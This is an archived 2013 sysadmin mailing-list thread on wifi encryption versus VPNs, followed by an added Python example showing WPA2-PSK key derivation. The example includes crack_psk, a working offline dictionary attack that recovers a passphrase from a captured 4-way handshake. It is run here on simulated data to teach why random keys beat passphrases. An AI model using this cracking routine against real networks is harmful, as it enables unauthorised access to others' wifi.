On Sat, 6 Apr 2013, Edward Ned Harvey (lopser) wrote:
> From: [email protected] [mailto:[email protected]]
> On Behalf Of David Lang
> Your Wifi is an untrusted network that can be sniffed and attacked by anyone in
> the area. So don't let it connect directly to your internal network.
> If you're using AES-256 and keys (not just passwords) then no, they can't sniff
> it. No more than they could sniff your VPN traffic on the public internet.
> It's not nearly that simple.
> Passwords are run through a hash algorithm to create the keys that are used.
> Wifi security is full of 'security' systems that we later find out can be
> brute-forced by the attackers. They don't need to attack the encryption directly
> to find the key, they can pull tricks like sniffing a legitimate message, then
> sending that packet, with each of the 256 possible next bytes and see which one
> the access point accepts, rinse and repeat.
> Then the wifi standards release a new encryption option, which they assure
> everyone really is secure this time.
> Then we find another silly little mistake in the process that makes the strong
> encryption algorithm they use meaningless.
> So they release another one, which they assure us is really secure this
> time.......
> How many times do they have to do this before they get it right?
> How many times do they have to do this before we decide that we don't believe
> that they got it right, and instead take other measures to protect ourselves so
> that we are safe even when they get it wrong?
> Once we have the other measures in place, why put users through the hassle of
> dealing with the wifi security instead of just using the other measures?
> Consider it a guest network, just like a hotel network, and have all your users
> connect to your company resources through a VPN, just like they would from home
> or a hotel.
> Ahh. Case in point. If you use encryption on the wifi that's as strong as
> the encryption on your VPN, then you don't need the VPN on the wifi.
I assume you mean "don't need encryption on the wifi"
Now, playing devil's advocate here. There may still be a reason to encrypt the
wifi, even if the wifi encryption is completely broken.
1. the "outrunning the bear" reason that if the AP shows as encrypted when
people are scanning, they may not bother with you and attack someone else
instead
2. casual devices (mobile devices, game stations, cameras, etc) don't all
support VPNs, so wifi encryption protects you from the most casual attacks.
3. "accidental" capturing of data. If someone is mapping wifi in your area, they
will capture anything you send out in plaintext (think the google fiasco here),
they may be doing this for perfectly legitimate reasons, but if your users are
careless (and you allow non-VPN traffic out of your wifi network) they may get
some things
4. turning on even WEP serves as a 'no trespassing' sign for your network, and
with the DMCA gives you additional legal tools if it's attacked.
David Lang
_______________________________________________
Tech mailing list
[email protected]
https://lists.lopsa.org/cgi-bin/mailman/listinfo/tech
This list provided by the League of Professional System Administrators
http://lopsa.org/
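The point in the thread above that "passwords are run through a hash algorithm to create the keys", and why that matters more than the cipher strength, worked through as an added example for this page. This is not code from the thread or from any of its participants. It assumes WPA2-PSK as specified in IEEE 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes), PTK from the 802.11i PRF, and an HMAC-SHA1-128 EAPOL MIC (key descriptor version 2). The SSID, passphrases, MAC addresses, nonces, EAPOL-Key frame and wordlist are all constructed for the example; the "password"/"IEEE" vector in the comment is the published 802.11i test vector.

```python
import hashlib
import hmac
import os
from typing import Optional

# WPA/WPA2-PSK: the passphrase never encrypts anything itself.  It is
# stretched into the 256-bit PMK with PBKDF2-HMAC-SHA1, salted with the SSID,
# 4096 iterations (IEEE 802.11i).  Test vector: "password"/"IEEE" ->
# f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e
def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def pmk_from_hex_psk(psk_hex: str) -> bytes:
    # "Keys, not passwords": a raw 64-hex-digit PSK is used as the PMK as-is,
    # so there is no human-chosen passphrase for a wordlist to guess.
    return bytes.fromhex(psk_hex)


# 802.11i PRF: PTK = PRF-384(PMK, "Pairwise key expansion",
#   min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce)).
# Everything in that input except the PMK is visible to a passive sniffer.
def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes,
               length: int = 48) -> bytes:
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out, counter = b"", 0
    while len(out) < length:
        msg = b"Pairwise key expansion\x00" + data + bytes([counter])
        out += hmac.new(pmk, msg, hashlib.sha1).digest()
        counter += 1
    return out[:length]


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    # Key descriptor version 2 (WPA2/CCMP): HMAC-SHA1 over the EAPOL-Key frame
    # with its MIC field zeroed, truncated to 128 bits.  KCK = PTK[0:16].
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def eapol_key_msg2(snonce: bytes, replay_counter: int = 1) -> bytes:
    # Constructed message 2 of the 4-way handshake, MIC field zeroed.
    # Layout follows 802.11i; the key data (RSN IE) is omitted for brevity.
    body = (
        b"\x02"                                # descriptor type: RSN
        + b"\x01\x0a"                          # key info: MIC set, pairwise, version 2
        + b"\x00\x00"                          # key length
        + replay_counter.to_bytes(8, "big")
        + snonce                               # 32-byte supplicant nonce
        + b"\x00" * 16                         # key IV
        + b"\x00" * 8                          # key RSC
        + b"\x00" * 8                          # key ID (reserved)
        + b"\x00" * 16                         # MIC, zeroed before MIC computation
        + b"\x00\x00"                          # key data length
    )
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body  # EAPOL v2, EAPOL-Key


def simulate_handshake(ssid: str, passphrase: str, aa: bytes, spa: bytes) -> dict:
    """Everything a passive sniffer captures: both MACs, both nonces, message 2, MIC."""
    anonce, snonce = os.urandom(32), os.urandom(32)
    kck = derive_ptk(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    frame = eapol_key_msg2(snonce)
    return {"ssid": ssid, "aa": aa, "spa": spa, "anonce": anonce, "snonce": snonce,
            "eapol": frame, "mic": eapol_mic(kck, frame)}


def crack_psk(capture: dict, wordlist) -> Optional[str]:
    """Offline dictionary attack: AES-CCMP is never touched, only the passphrase."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, capture["ssid"])
        kck = derive_ptk(pmk, capture["aa"], capture["spa"],
                         capture["anonce"], capture["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, capture["eapol"]), capture["mic"]):
            return candidate
    return None


if __name__ == "__main__":
    ap_mac = bytes.fromhex("020000000001")   # constructed locally-administered MACs
    sta_mac = bytes.fromhex("020000000002")
    cap = simulate_handshake("ExampleNet", "correct horse", ap_mac, sta_mac)
    print("recovered passphrase:", crack_psk(cap, ["password", "letmein123", "correct horse"]))
```

Once one handshake is captured, the attacker needs no further contact with the access point; each guess costs 4096 HMAC-SHA1 iterations plus the PRF and MIC, which is a constant slowdown, not a barrier, for a weak passphrase. A random 256-bit PSK entered as 64 hex digits (pmk_from_hex_psk) has nothing for the wordlist to find, which is the "keys, not passwords" distinction made in the thread.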